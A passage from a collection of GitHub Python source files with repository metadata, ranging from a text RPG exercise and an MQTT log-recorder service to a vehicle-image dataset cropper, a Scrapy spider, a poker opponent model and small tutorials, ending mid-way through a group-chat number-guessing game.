 print('------------')\r\n        elif chance >= 41:\r\n            print('-----------')\r\n            print(f'{self.__class__.__name__} attack {target.__class__.__name__} with sword ')\r\n            target.health -= 3\r\n            if target.__class__.__name__ == 'Wizard':\r\n                print(f'Health of {target.__class__.__name__} lowered to {target.health}')\r\n            print(f'Health of {target.__class__.__name__} lowered to {target.health}')\r\n            print('------------')\r\n        else:\r\n            print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\r\n\r\n\r\nclass Wizard(Mage):\r\n    def __init__(self, health=50, barrier=100, mana=100):\r\n        # The parent constructor is usually called first\r\n        super().__init__(health, mana)\r\n        self.__barrier = barrier\r\n\r\n\r\n    def _get_barrier(self):\r\n        return self.__barrier\r\n\r\n    # Already present in the parent\r\n    #@property\r\n    #def health(self):\r\n    #    return self.__health\r\n\r\n\r\n    # The Mage class has no stamina. This method needs rewriting:\r\n    #def heal(self, target):\r\n    #    if self.__sta >= 20:\r\n    ##        print('-----------')\r\n    #        print(f'{self.__class__.__name__} casts a heal spell on '\r\n    #              f'{target.__class__.__name__}')\r\n    #        target._set_health(10)\r\n    #        self.__stamina -= 20\r\n    #        print(f'Health of {target.__class__.__name__} upgraded to {target._get_armor}',\r\n    #              f'\\nNow {self.__class__.__name__} have only {self.__stamina} stamina')\r\n    ##        print('------------')\r\n    #    else:\r\n    #        print(\"Not enough stamina for this action\")\r\n\r\n    # This could be defined in the parent class\r\n    #def attacks(self, target):\r\n    #    chance = random.randint(1, 100)\r\n    #    if chance <= 20:\r\n    #        print('-----------')\r\n    #        print(f'{self.__class__.__name__} attack {target.__class__.__name__} with magic and summon fire ball ')\r\n    #        target._set_health(-15) # no such setter - this would raise an error\r\n    #        if target.__class__.__name__ == 'Knight':\r\n    #            print(f'Armor of {target.__class__.__name__} lowed to {target._get_armor()}')\r\n    #        print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\r\n    #        print('------------')\r\n    #    elif chance >= 21:\r\n    #        print('-----------')\r\n    #        print(f'{self.__class__.__name__} attack {target.__class__.__name__} with magic ')\r\n    #        target._set_health(-3) # likewise - this setter does not exist\r\n    #        if target.__class__.__name__ == 'Knight':\r\n    #            pass\r\n    #        #print(f'Armor of {target.__class__.__name__} lowed to {target._get_armor()}')\r\n    #        print(f'Health of {target.__class__.__name__} lowed to {target._get_health()}')\r\n    #        print('------------')\r\n    #    else:\r\n    #        print(self.__class__.__name__, \"makes final punch and kills\", target.__class__.__name__)\r\n\r\n\r\nunit1 = Warrior(50, 50)\r\nprint(unit1.health)\r\nunit2 = Wizard(50, 50, 50)\r\nunit1.attacks(unit2)\r\nunit1.heal(unit2)\r\n","repo_name":"VladBaryliuk/my_start_tasks","sub_path":"new/src/06.03.2021/refactored.py","file_name":"refactored.py","file_ext":"py","file_size_in_byte":9355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"6928865764","text":"#!/usr/bin/env python3\n#\n# Aiko Service: Recorder\n# ~~~~~~~~~~~~~~~~~~~~~~\n#\n# Usage\n# ~~~~~\n# mosquitto_sub -t '#' -v\n# REGISTRAR=0 registrar &\n# RECORDER=0 ./recorder.py [topic_path_filter] &\n#\n# Where \"topic_path_filter\" default: \"aiko/+/+/+/log\"\n#\n# To Do\n# ~~~~~\n# - Improve CLI to record multiple different topic paths\n# - On-the-fly configuration ...\n#   - _RING_BUFFER_SIZE, _TOPIC_LRU_CACHE_SIZE\n#   - topic_path_filter causes unsubscribe and resubscribe to correct topic\n# - Keep statistics for ...\n#   - Topic LRU cache length\n#   - Total messages received / sent, messages received / sent per second\n# - Why doesn't Python MQTT client subscribe(\"+/+/+/+/log\") work ?\n\nimport click\nfrom collections import deque\n\nfrom aiko_services import *\nfrom aiko_services.utilities import *\n\nSERVICE_TYPE = \"recorder\"\nPROTOCOL = f\"{ServiceProtocol.AIKO}/{SERVICE_TYPE}:0\"\n\n_LOGGER = aiko.logger(__name__)\n_VERSION = 0\n\n_LRU_CACHE_SIZE = 2  # 128\n_RING_BUFFER_SIZE = 2  # 128\n\n# --------------------------------------------------------------------------- #\n\nclass Recorder(Service):\n    def __init__(self,\n        implementations, name, protocol, tags, transport,\n        topic_path_filter):\n\n        implementations[\"Service\"].__init__(self,\n            implementations, name, protocol, tags, transport)\n\n# TODO: Add LRUCache popitem() handler to remove oldest ring buffer ?\n#       And send ECProducer.remove(topic) to update the ECConsumer\n        self.lru_cache = LRUCache(_LRU_CACHE_SIZE)\n\n        self.state = {\n            
\"lifecycle\": \"ready\",\n \"log_level\": get_log_level_name(_LOGGER),\n \"source_file\": f\"v{_VERSION}⇒{__file__}\",\n \"lru_cache\": {}, # HACK\n \"lru_cache_size\": _LRU_CACHE_SIZE,\n \"ring_buffer_size\": _RING_BUFFER_SIZE,\n \"topic_path_filter\": topic_path_filter\n }\n self.ec_producer = ECProducer(self, self.state)\n self.ec_producer.add_handler(self._ec_producer_change_handler)\n\n self.add_message_handler(self.recorder_handler, topic_path_filter)\n\n def _ec_producer_change_handler(self, command, item_name, item_value):\n if item_name == \"log_level\":\n _LOGGER.setLevel(str(item_value).upper())\n\n def recorder_handler(self, aiko, topic, payload_in):\n if topic in self.lru_cache:\n ring_buffer = self.lru_cache.get(topic)\n else:\n ring_buffer = deque(maxlen=_RING_BUFFER_SIZE)\n# TODO: If LRUCache popitem(), then manually remove oldest ring buffer ?\n# And send ECProducer.remove(topic) to update the ECConsumer\n self.lru_cache.put(topic, ring_buffer)\n\n# TODO: \"utilities/parser.py\": generate() and parse() need to handle\n# log messages with special characters ... use Canonical S-Expressions ?\n\n log_record = payload_in.replace(\" \", \"_\")\n log_record = log_record.replace(\"(\", \"{\")\n log_record = log_record.replace(\")\", \"}\")\n ring_buffer.append(log_record)\n self.ec_producer.update(f\"lru_cache.{topic}\", log_record) # HACK\n\n# TODO: \"share.py:ECConsumer._consumer_handler()\" needs to handle list and dict\n# Appears that the \"(add ...)\" fails, but \"(update ...)\" works ?\n# Dashboard being updated with dict of entries that are lists ... works !\n\n# --------------------------------------------------------------------------- #\n\n@click.command(\"main\", help=\"Recorder Service\")\n@click.argument(\"topic_path_filter\", nargs=1, required=False,\n default=f\"{get_namespace()}/+/+/+/log\")\ndef main(topic_path_filter):\n tags = [\"ec=true\"] # TODO: Add ECProducer tag before add to Registrar\n init_args = service_args(SERVICE_TYPE, PROTOCOL, tags)\n init_args[\"topic_path_filter\"] = topic_path_filter\n recorder = compose_instance(Recorder, init_args)\n aiko.process.run()\n\nif __name__ == \"__main__\":\n main()\n\n# --------------------------------------------------------------------------- #\n","repo_name":"geekscape/aiko_services","sub_path":"aiko_services/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"34087089694","text":"from setuptools import setup\nimport os \nfrom glob import glob \n\npackage_name = 'marselotech_my_nav2_system'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n (os.path.join('share', package_name, 'config'), glob('config/*.pgm')),\n (os.path.join('share', package_name, 'config'), glob('config/*.yaml')),\n (os.path.join('share', package_name, 'config'), glob('config/*.rviz')),\n (os.path.join('share', package_name, 'launch'), glob('launch/*.launch.py')),\n (os.path.join('share', package_name, 'launch'), glob('marselotech_my_nav2_system/*.py')),\n (os.path.join('share', package_name, 'config'), glob('config/*.lua')),\n (os.path.join('share', package_name, 'config'), glob('config/*.yaml')),\n (os.path.join('share', package_name, 'config'), glob('config/*.xml')) \n\n \n ],\n install_requires=['setuptools'],\n zip_safe=True,\n 
maintainer='asperez@upv.es',\n    maintainer_email='asperez@upv.es@todo.todo',\n    description='TODO: Package description',\n    license='TODO: License declaration',\n    tests_require=['pytest'],\n    entry_points={\n        'console_scripts': [\n            'initial_pose_pub = marselotech_my_nav2_system.initial_pose_pub:main', # add\n            'action_server = marselotech_my_nav2_system.action_server:main',\n            'nav_to_pose = marselotech_my_nav2_system.nav_to_pose:main', # include\n            'waypoint_follower = marselotech_my_nav2_system.waypoint_follower:main'\n\n        ],\n    },\n)\n","repo_name":"leire07/marselotech","sub_path":"marselotech_my_nav2_system/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"35661987785","text":"import time\r\nimport logging\r\nimport threading\r\n\r\n\r\n#sleep(seconds), e.g.: 0.5\r\n\r\n\r\nlogging.basicConfig(\r\n    level=logging.DEBUG,\r\n    format='%(thread)s %(threadName)s : %(message)s'\r\n)\r\n\r\ndef task():\r\n    logging.info('Se ejecuta una nueva tarea')\r\n    time.sleep(2)\r\n    logging.info('Se terminó la nueva tarea')\r\n\r\n\r\nif __name__ == '__main__':\r\n    #thread = threading.Thread(target=task)\r\n    #thread.start()\r\n\r\n    contador=0\r\n\r\n    while True:\r\n        time.sleep(1)\r\n        contador+=1\r\n        logging.info(f'Tiempo transcurrido: {contador} segundos')\r\n\r\n","repo_name":"eduardotorrezh/PythonConcurrentExamples","sub_path":"Introduccion/DormirHilo.py","file_name":"DormirHilo.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"15836122820","text":"import numpy as np\nimport xml.etree.ElementTree as ET\nfrom PIL import Image\nimport os\nimport random\nimport argparse\nimport sys  # needed by the sys.exit() calls in __main__\n\n\nclass CreateDataset:\n\n    def __init__(self,\n                 DETRAC_images,\n                 DETRAC_annots,\n                 output_train,\n                 occlusion_threshold,\n                 truncation_threshold,\n                 occurrences):\n        self.root_images = DETRAC_images\n        self.root_annots = DETRAC_annots\n        self.output_folder = output_train\n        self.occ_thresh = occlusion_threshold\n        self.trunc_thresh = truncation_threshold\n        self.no_of_occurrences = occurrences\n        self.resize = (100, 100)\n\n    def get_sequences(self):\n        sequences = [x[1] for x in os.walk(self.root_images)]\n        sequences = sequences[0]\n        return sequences\n\n    def calc_dict(self, frames):\n        target_id_dict = {}\n        for frame in frames:\n            frame_num = int(frame.attrib['num'])\n            target_list = frame.find('target_list')\n            targets = target_list.findall('target')\n            for target in targets:\n                target_id = target.attrib['id']\n                attribute = target.find('attribute')\n                occlusion = target.find('occlusion')\n\n                box = target.find('box')\n                width = round(float(box.attrib['width']))\n                height = round(float(box.attrib['height']))\n\n                truncation_ratio = float(attribute.attrib['truncation_ratio'])\n\n                if occlusion is not None:\n                    region_overlap = occlusion.find('region_overlap')\n                    overlap_width = round(float(region_overlap.attrib['width']))\n                    overlap_height = round(float(region_overlap.attrib['height']))\n                    occlusion_ratio = (overlap_width * overlap_height) / (width * height)\n                else:\n                    occlusion_ratio = 0\n\n                if target_id not in list(target_id_dict):\n                    target_id_dict[target_id] = []\n\n                if occlusion_ratio < self.occ_thresh and truncation_ratio < self.trunc_thresh:\n                    target_id_dict[target_id].append(frame_num)\n\n        for target_id in list(target_id_dict):\n            no_of_occurrences = len(target_id_dict[target_id])\n            if no_of_occurrences >= self.no_of_occurrences:\n                
min_frame = min(target_id_dict[target_id])\n max_frame = max(target_id_dict[target_id])\n sample = random.sample(range(min_frame, max_frame), min(self.no_of_occurrences, len(range(min_frame, max_frame))))\n target_id_dict[target_id] = sample\n\n elif no_of_occurrences < self.no_of_occurrences:\n target_id_dict.pop(target_id)\n return target_id_dict\n\n def crop_sequence_images(self, sequences):\n max_target_id = 0\n for sequence in sequences:\n tree = ET.parse(self.root_annots + sequence + '_v3.xml')\n root = tree.getroot()\n frames = root.findall('frame')\n target_id_dict = self.calc_dict(frames)\n target_id_list = list(target_id_dict)\n\n for frame in frames:\n target_list = frame.find('target_list')\n targets = target_list.findall('target')\n frame_num = int(frame.attrib['num'])\n for target in targets:\n box = target.find('box')\n target_id = target.attrib['id']\n if target_id in target_id_list:\n frame_list = target_id_dict[target_id]\n if frame_num in frame_list:\n left = round(float(box.attrib['left']))\n top = round(float(box.attrib['top']))\n width = round(float(box.attrib['width']))\n height = round(float(box.attrib['height']))\n\n right = left + width\n bottom = top + height\n\n image_frame = \"img\" + str(frame_num).zfill(5) + '.jpg'\n\n rectangle = (left, top, right, bottom)\n\n # vehicle_type = attribute.attrib['vehicle_type']\n # truncation_ratio = attribute.attrib['truncation_ratio']\n image = Image.open(self.root_images + sequence + '/' + image_frame)\n image = image.crop(rectangle)\n image = image.resize(self.resize)\n market1501_id = str(int(target_id) + int(max_target_id)).zfill(5) + '_c' + sequence[-5:] \\\n + 's1_' + str(frame_num).zfill(5) + '_01'\n image.save(self.output_folder + market1501_id + '.jpg')\n\n max_target_id += int(target_id)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Create cropped sequences of vehicles from DETRAC dataset.\")\n parser.add_argument(\"--DETRAC_images\",\n help=\"Relative location of DETRAC training images.\",\n default=\"./Insight-MVT_Annotation_Train/\")\n parser.add_argument(\"--DETRAC_annots\",\n help=\"Relative location of DETRAC annotation files.\",\n default=\"./DETRAC-Train-Annotations-XML-v3/\")\n parser.add_argument(\"--output_train\",\n help=\"Relative output location of cropped training images.\",\n default=\"./DETRAC_cropped/\")\n parser.add_argument(\"--occlusion_threshold\",\n help='Ignore images with an occlusion ratio higher than the threshold.',\n default=0.5, type=float)\n parser.add_argument(\"--truncation_threshold\",\n help='Ignore images with an truncation ratio higher than the threshold.',\n default=0.5, type=float)\n parser.add_argument(\"--occurrences\",\n help='Number of occurrences of each sequence of vehicles.',\n default=100, type=int)\n args = parser.parse_args()\n \n DETRAC_images = args.DETRAC_images\n if not os.path.exists(DETRAC_images):\n print('Cannot find path to DETRAC images.')\n sys.exit()\n\n DETRAC_annots = args.DETRAC_annots\n if not os.path.exists(DETRAC_annots):\n print('Cannot find path to DETRAC annotations.')\n sys.exit()\n\n output_train = args.output_train\n if not os.path.exists(output_train):\n os.makedirs(output_train)\n\n if not os.access(output_train, os.W_OK):\n print('{} folder is not writeable.'.format(output_train))\n\n occlusion_threshold = args.occlusion_threshold\n truncation_threshold = args.truncation_threshold\n occurrences = args.occurrences\n\n create_dataset = CreateDataset(DETRAC_images,\n DETRAC_annots,\n output_train,\n 
occlusion_threshold,\n truncation_threshold,\n occurrences)\n\n sequences = create_dataset.get_sequences()\n\n create_dataset.crop_sequence_images(sequences)\n\n","repo_name":"LeonLok/Multi-Camera-Live-Object-Tracking","sub_path":"detrac_tools/crop_dataset.py","file_name":"crop_dataset.py","file_ext":"py","file_size_in_byte":7632,"program_lang":"python","lang":"en","doc_type":"code","stars":875,"dataset":"github-code","pt":"57"} +{"seq_id":"29813747548","text":"my_variable = \"hello\"\n\ngrades = [77, 80, 90]\ntuple_grades = (77, 80, 90)\nset_grades = {77, 80, 90}\n\nset_grades.add(60)\n# print(set_grades)\n\n\nyour_lottery_numbers = {1, 2, 3, 4, 5}\nwinning_numbers = {1, 3, 5, 7, 9, 11}\n\n# print(your_lottery_numbers.intersection(winning_numbers))\n# print(your_lottery_numbers.union(winning_numbers))\n# print({1, 2, 3, 4}.difference({1, 2}))\n","repo_name":"Chil625/FlaskPractice","sub_path":"lec1/lists_tuples_sets.py","file_name":"lists_tuples_sets.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"29547066269","text":"import pyjd\n\nfrom pyjamas import DOM\nfrom pyjamas import logging\n\nfrom pyjamas.ui.RootPanel import RootPanel\nfrom pyjamas.ui.HTML import HTML\nfrom pyjamas.ui.Label import Label\nfrom pyjamas.ui.Map import ImageMap, MapArea\nfrom pyjamas.ui.HorizontalPanel import HorizontalPanel\nfrom pyjamas.ui.VerticalPanel import VerticalPanel\nfrom pyjamas.ui.ScrollPanel import ScrollPanel\nfrom pyjamas.ui.MenuBar import MenuBar\nfrom pyjamas.ui.Image import Image\nfrom pyjamas.ui.ContextMenuPopupPanel import ContextMenuPopupPanel\n\nlog = logging.getAppendLogger(__name__, logging.DEBUG, logging.PLAIN_FORMAT)\n\n\nclass MapAreaDemo:\n\n def onModuleLoad(self):\n # build image display\n width = 200 #px\n height = 215 #px\n scale = 1.5\n img = Image(\n \"babykatie_small.jpg\",\n Width=\"%dpx\" % int(scale * width),\n Height=\"%dpx\" % int(scale * height),\n )\n img.element.setAttribute(\"usemap\", \"#themap\")\n img.element.setAttribute(\"ismap\", \"1\")\n imagepanel = ScrollPanel()\n imagepanel.add(img)\n\n # build message display\n msgpanel = VerticalPanel()\n msgpanel.add(Label(\"move mouse over baby katie's eyes, nose and mouth.\"))\n msgarea1 = Label(\"movement messages\")\n msgpanel.add(msgarea1)\n msgarea2 = Label(\"click messages\")\n msgpanel.add(msgarea2)\n\n imageClickHandler = MapClickHandler(msgarea1, msgarea2)\n\n # build imagemap\n map = ImageMap(\"themap\",\n Width=\"%dpx\" % int(scale * width),\n Height=\"%dpx\" % int(scale * height),\n )\n areas = [ \\\n NamedMapArea(\n \"right eye\",\n \"circle\",\n [scale * i for i in [73, 97, 7]],\n ),\n NamedMapArea(\n \"left eye\",\n \"circle\",\n [scale * i for i in [116, 88, 5]],\n ),\n NamedMapArea(\n \"nose\",\n \"rect\",\n [scale * i for i in [88, 97, 115, 115]],\n Href=\"http://lkcl.net\",\n ),\n NamedMapArea(\n \"mouth\",\n \"polygon\",\n [scale * i for i in [82, 129, 102, 124, 119, 119, 121, 125, 103, 132, 79, 133]],\n ),\n ]\n for nma in areas:\n nma.addMouseListener(imageClickHandler)\n nma.addClickListener(imageClickHandler)\n map.add(nma)\n\n # layout page\n hpanel = HorizontalPanel()\n hpanel.add(map)\n hpanel.add(imagepanel)\n hpanel.add(msgpanel)\n\n RootPanel().add(hpanel)\n\n\nclass NamedMapArea(MapArea):\n \"\"\" An area inside an imagemap with a name\n \"\"\"\n\n def __init__(self, areaname, shape, coords, Href=\"\", **kwargs):\n self.areaname = areaname\n coords = \", \".join([\"%d\" % int(i) for i in 
coords])\n        MapArea.__init__(self, shape, coords, Href=Href, **kwargs)\n\n\nclass MapClickHandler:\n\n    def __init__(self, msgarea1, msgarea2):\n        self.msgarea1 = msgarea1\n        self.msgarea2 = msgarea2\n\n    def _mouseActionMessage(self, name, action, x=None, y=None):\n        #msg = \"%s %s (%d,%d)\" % (name, action, x, y) # throws JS errors\n        msg = name + ' ' + action + ' (' + str(x) + ', ' + str(y) + ')'\n        self.msgarea1.setText(msg)\n        log.debug(msg)\n\n    def onMouseMove(self, sender, x, y):\n        self._mouseActionMessage(sender.areaname, \"move\", x, y)\n\n    def onMouseDown(self, sender, x, y):\n        self._mouseActionMessage(sender.areaname, \"down\", x, y)\n\n    def onMouseUp(self, sender, x, y):\n        self._mouseActionMessage(sender.areaname, \"up\", x, y)\n\n    def onMouseEnter(self, sender):\n        self._mouseActionMessage(sender.areaname, \"enter\")\n\n    def onMouseLeave(self, sender):\n        self._mouseActionMessage(sender.areaname, \"leave\")\n\n    def onClick(self, sender):\n        msg = \"you clicked on baby katie's \" + sender.areaname\n        self.msgarea2.setText(msg)\n        log.debug(msg)\n\n\nif __name__ == '__main__':\n    pyjd.setup(\"http://127.0.0.1/examples/maparea/public/MapAreaDemo.html\")\n    app = MapAreaDemo()\n    app.onModuleLoad()\n    pyjd.run()\n","repo_name":"pyjs/pyjs","sub_path":"examples/maparea/MapAreaDemo.py","file_name":"MapAreaDemo.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":1132,"dataset":"github-code","pt":"57"}
{"seq_id":"43053182418","text":"from gametree.playerstate.player_id import PlayerId\n\nfrom gametree.gamestate.game_state import GameState\n\nfrom typing import Tuple\n\nfrom opp_model import OpponentModel\nfrom sklearn.tree import DecisionTreeClassifier\nfrom pickle import load\nfrom pandas import DataFrame\n\nclass Opponents(OpponentModel):\n    botId: PlayerId\n    model: DecisionTreeClassifier\n\n\n    def __init__(self, id: PlayerId):\n        self.botId = id\n\n        decision_tree_model_pkl = open(\"opp_model.pkl\", 'rb')\n        self.model = load(decision_tree_model_pkl)\n\n    def get_bot_id(self) -> PlayerId:\n        return self.botId  # the attribute is named botId, not botID\n\n    def get_action_probs(self, gs:GameState):\n        player_map = {player: seat for seat, player in gs.seat_map.items()}\n        suit_map = {\"C\": 0, \"D\": 1, \"H\": 2, \"S\": 3}\n        num_map = {\"A\": 1, \"T\": 10, \"J\": 11, \"Q\": 12, \"K\": 13}\n        action_list = []\n        hand_list = []\n        community_card_list = []\n        for player, seat in player_map.items():\n            if seat.getId() < player_map[self.botId].getId():\n                # Get known actions\n                # TO DO: convert output of get_prev_action() to -1,0,1+\n                action_list.append(player.get_prev_action())\n            elif(seat.getId() == player_map[self.botId].getId()):\n                for card in player.get_cards():\n                    try:\n                        num_val = num_map[card.rank]\n                    except KeyError:\n                        num_val = int(card.rank)\n                    hand_list.append(suit_map[card.suit]*13 + num_val)\n            else:\n                action_list.append(-10)\n\n        for card in gs.get_community_cards():\n            try:\n                num_val = num_map[card.rank]\n            except KeyError:\n                num_val = int(card.rank)\n            community_card_list.append(suit_map[card.suit]*13 + num_val)\n        for _ in range(len(gs.get_community_cards()),5):  # call the method; pad the board to 5 cards\n            community_card_list.append(0)\n\n        input_cols = {'hand1':[],'hand2':[],'board1':[],'board2':[],'board3':[],'board4':[],'board5':[], 'action1':[],'action2':[],'action3':[],'action4':[],'action5':[]}\n        input = DataFrame(input_cols)\n        input.loc[0] = [*hand_list, *community_card_list, *action_list]\n\n        return self.model.predict(input), self.model.predict_proba(input)\n    \n    def get_check_bet_probabilities(self, gamestate: GameState, actor: PlayerId) 
-> Tuple[float, float]:\n        _, probs = self.get_action_probs(gamestate)\n        return (sum(probs[:2]), sum(probs[2:]))\n\n    def get_fold_call_raise_probabilities(self, gamestate: GameState, actor: PlayerId) -> Tuple[float, float, float]:\n        _, probs = self.get_action_probs(gamestate)\n        return (probs[0], probs[1], sum(probs[2:]))","repo_name":"kshah0/pokerProject","sub_path":"src/opponents.py","file_name":"opponents.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"18644819202","text":"\"\"\"docx_tutorial.py\nTutorial code: https://python-docx.readthedocs.io/en/latest/\n\"\"\"\nfrom docx import Document\nfrom docx.shared import Inches\n\ndocument = Document()\n\n# Add a heading -> H0\ndocument.add_heading(\"Document Title\", 0)\n\n# Add a paragraph and runs, apply attributes\np = document.add_paragraph(\"A plain paragraph having some \")\np.add_run(\"bold\").bold = True\np.add_run(\" and some \")\np.add_run(\"italic\").italic = True\n\ndocument.add_heading(\"Heading, level 1\", level=1)\n# Apply styles\ndocument.add_paragraph(\"Intense quote\", style=\"Intense Quote\")\ndocument.add_paragraph(\"first item in unordered list\", style=\"List Bullet\")\ndocument.add_paragraph(\"first item in ordered list\", style=\"List Number\")\n\n# Add a picture\ndocument.add_picture(\"catlogo.png\", width=Inches(1.25))\n\nrecords = (\n    (3, \"101\", \"Spam\"),\n    (7, \"422\", \"Eggs\"),\n    (4, \"631\", \"Spam, spam, eggs, and spam\")\n)\n\n# Add a table\ntable = document.add_table(rows=1, cols=3)\nhdr_cells = table.rows[0].cells\nhdr_cells[0].text = \"Qty\"\nhdr_cells[1].text = \"Id\"\nhdr_cells[2].text = \"Desc\"\nfor qty, id, desc in records:\n    row_cells = table.add_row().cells\n    row_cells[0].text = str(qty)\n    row_cells[1].text = id\n    row_cells[2].text = desc\n\ndocument.add_page_break()\n\ndocument.save(\"demo.docx\")\n","repo_name":"zeroam/TIL","sub_path":"books/PythonAutomate/pdf_word_documents/docx_tutorial.py","file_name":"docx_tutorial.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
{"seq_id":"72117597298","text":"# -*- coding: utf-8 -*-\n# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\nimport scrapy\nfrom scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nfrom scrapyexe.items import ScrapyexeItem\nfrom scrapy.loader import ItemLoader\nfrom scrapy import Request\nimport re\nclass ScrapyexeSpider(Spider):\n    name = 'dianping_old'\n    allowed_domains = ['www.dianping.com']\n    start_urls = ['http://s.dianping.com/chengdu/group?utm_source=dp_pc_index']\n\n    def parse(self,response):\n        item_num = len(response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[*]/div/h3').extract())\n        print(item_num)\n        for i in range(item_num):\n            item = ScrapyexeItem()\n            item['title'] = response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/h3/a/text()'%(i)).extract()[0] # extract() returns a list\n            item['url'] = response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/h3/a/@href'%(i)).extract()[0]\n            author = response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/div/a[2]/text()'%(i)).extract()[0]\n            item['author'] = author.strip()\n            item['group']=response.selector.xpath('//*[@id=\"list-recomend\"]/ul/li[%d+1]/div/div/a[3]/text()'%(i)).extract()[0]\n            url = str(item['url'])\n            #print(url)\n            # url = 'https://www.jianshu.com'+url\n            # yield Request(url, callback=self.parse_detail)\n            yield item\n            yield Request(url, callback=self.parse_details, dont_filter=True)\n            break\n    def parse_details(self, response):\n        details_info = response.xpath('/html/body/div[2]/div[3]/div[2]')\n        if details_info:\n            # l = ItemLoader(ScrapyexeItem(),details_info)\n            # l.add_xpath('content','/html/body/div[2]/div[3]/div[2]/div[3]/text()')\n            # yield l.load_item()\n            item_content = ScrapyexeItem()\n            content_num = len(response.selector.xpath('/html/body/div[2]/div[3]/div[2]/div[3]/div[*]').extract())\n\n            print(content_num)\n            content = ''\n            for i in range(content_num):\n                content += response.selector.xpath('/html/body/div[2]/div[3]/div[2]/div[3]/div[%d+1]'%(i)).extract()[0]\n            # print(content)\n            zh = re.compile(u'[\\u4e00-\\u9fa5]+') # regex that extracts Chinese characters\n            content = re.findall(zh,content)\n            content = ''.join(content)\n            #print(content)\n            item_content['content'] = content\n            yield item_content\n\n","repo_name":"jiaweijin/lilaroka","sub_path":"scrapyexe/spiders/dianping.py","file_name":"dianping.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
{"seq_id":"1022083135","text":"# closure2.py\n\n# Create a family of functions:\n# def pow2(x):\n#     return x ** 2\n\n# def pow3(x):\n#     return x ** 3\n# ...\n# def pow300(x):\n#     return x ** 300\n# ...\n\ndef make_power(y):\n    def fn(x):\n        return x ** y\n    return fn\n\npow2 = make_power(2)  # pow2 is bound to the closure function\nprint(pow2(3))  # 9\nprint(pow2(4))  # 16\n\npow5 = make_power(5)\nprint(pow5(2))  # 32\nprint(pow5(4))  # 1024\n\n","repo_name":"zuigehulu/AID1811","sub_path":"pbase/day11/jiangyi/day11/code/closure2.py","file_name":"closure2.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
{"seq_id":"10944140058","text":"# -*- coding=utf8 -*-\n\nimport random\n\nGROUP_NOT_EXIST = 999\n\nguessNumberPool = {}  # stores the running game for each group chat\n\nclass GuessNumber(object):\n    def __init__(self, lower, upper=None):\n        if not upper:\n            upper = lower\n            lower = 0\n        self.lower = lower\n        self.upper = upper\n        self.answer = random.randint(lower, upper)\n        self.rounds = 0\n        # print(\"新游戏:{l}, {u}, {a}\".format(l=self.lower, u=self.upper, a=self.answer))\n\n    def guess(self, g, member):\n        if g<self.lower or g>self.upper:\n            return -1, \"{g} 不在范围哇\".format(g=g)\n        elif g==self.answer:\n            self.rounds += 1\n            return 1, \"{m}猜中了数字{a}!\\n回合数:{r}\".format(m=member.name, a=self.answer, r=self.rounds)\n        elif g < self.answer:\n            self.lower = g+1\n            self.rounds += 1\n            return 0, \"新范围 [{lower}, {upper}]\".format(\n                lower=self.lower, upper=self.upper)\n        else:\n            self.upper = g-1\n            self.rounds += 1\n            return 0, \"新范围 [{lower}, {upper}]\".format(\n                lower=self.lower, upper=self.upper)\n\n    def restart(self, lower, upper=None):\n        if not upper:\n            upper = lower\n            lower = 0\n        self.lower = lower\n        self.upper = upper\n        self.answer = random.randint(lower, upper)\n        self.rounds = 0\n\n    def __repr__(self):\n        return \"范围在 [{lower}, {upper}]\".format(lower=self.lower, upper=self.upper)\n\n\ndef help():\n    res = \"发送消息:\\n\"\n    res += \"“猜数字 xx” - 开启 0~xx 的新游戏\\n\"\n    res += \"“猜数字 xx yy” - 开启 xx~yy 的新游戏\\n\"\n    res += \"“zz” - 一轮猜数字\\n\"\n    res += \"“范围” - 显示数字范围\\n\"\n    res += \"“结束” - 结束游戏\\n\"\n    res += \"“帮助” - 查看帮助\"\n    return res\n\n\ndef newGame(group, lower, upper=None):\n    if guessNumberPool.get(group):\n        guessNumberPool[group].restart(lower, upper)\n    else:\n        guessNumberPool[group] = GuessNumber(lower, upper)\n    return guessNumberPool[group]\n\n\ndef guess(group, number, member):\n    if guessNumberPool.get(group):\n        return guessNumberPool[group].guess(number, member)\n    else:\n        return GROUP_NOT_EXIST, False\n\n\n# check whether a string represents an integer\ndef RepresentsInt(s):\n    try: \n        int(s)\n        return True\n    except ValueError:\n        return False\n\n\ndef checkRaw(group, member, raw):\n    # check whether the user wants to start a new game\n    cmd = raw.strip().split()\n    if len(cmd) == 2 and cmd[0] == \"猜数字\" and RepresentsInt(cmd[1]) and int(cmd[1]) > 0:\n        return newGame(group, int(cmd[1]))\n    elif 